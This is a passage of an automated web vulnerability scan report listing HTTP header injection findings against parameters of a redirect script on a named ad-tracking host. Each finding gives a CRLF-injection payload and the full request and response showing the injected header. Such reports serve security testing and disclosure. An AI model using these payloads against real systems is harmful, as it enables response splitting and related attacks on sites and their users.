User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:46 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qrgqABU0AAFrNY7g; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:46 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:46 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk294110218044846981ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:46 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=17105
761b2c412d9
&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=294110218044846981&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.4. http://j.jioet.com/cgi/r [LeadSiteURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the LeadSiteURL request parameter is copied into the Location response header. The payload 57288%0d%0a1f8a21ef9e9 was submitted in the LeadSiteURL parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288%0d%0a1f8a21ef9e9&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:42 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qqgqABU0AAARrfuY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:42 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:42 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk832110218044842248ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:42 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288
1f8a21ef9e9
&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=832110218044842248&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 801

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.5. http://j.jioet.com/cgi/r [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the css request parameter is copied into the Location response header. The payload c2453%0d%0ad4fa898969d was submitted in the css parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453%0d%0ad4fa898969d&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:01 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qgQqABU0AAEdKNII; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:01 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:01 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk516110218044801584ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:01 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=c2453
d4fa898969d
&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=516110218044801584&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1054

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.6. http://j.jioet.com/cgi/r [ctnum parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ctnum request parameter is copied into the Location response header. The payload 9df03%0d%0a6d42c08a398 was submitted in the ctnum parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03%0d%0a6d42c08a398&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:46 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qcgqABU0AAG-5ZBk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:46 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:46 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk773110218044746465ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:46 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=9df03
6d42c08a398
&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=773110218044746465&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1137

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.7. http://j.jioet.com/cgi/r [fc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the fc request parameter is copied into the Location response header. The payload 324fe%0d%0af3e39cf64e0 was submitted in the fc parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe%0d%0af3e39cf64e0&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:19 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qkwqABU0AAEbtURk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:19 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:19 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk416110218044819625ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:19 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=324fe
f3e39cf64e0
&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=416110218044819625&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.8. http://j.jioet.com/cgi/r [ff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ff request parameter is copied into the Location response header. The payload aa97d%0d%0abdd9024737e was submitted in the ff parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d%0d%0abdd9024737e&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:18 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qkgqABU0AAHBvVik; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:18 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:18 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk433110218044818412ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:18 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=aa97d
bdd9024737e
&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=433110218044818412&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.9. http://j.jioet.com/cgi/r [ft parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ft request parameter is copied into the Location response header. The payload fb7cd%0d%0adb9c0b1d9c4 was submitted in the ft parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd%0d%0adb9c0b1d9c4&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:37 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qaQqABU0AAATvdq0; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:37 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:37 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk182110218044737313ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:37 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=fb7cd
db9c0b1d9c4
&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=182110218044737313&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1131

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.10. http://j.jioet.com/cgi/r [hidepriv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the hidepriv request parameter is copied into the Location response header. The payload 7e042%0d%0ae45d4f30234 was submitted in the hidepriv parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=7e042%0d%0ae45d4f30234& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:49 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qsQqABU0AAG-VGJo; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:49 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:49 GMT; DOMAIN=.jioet.com
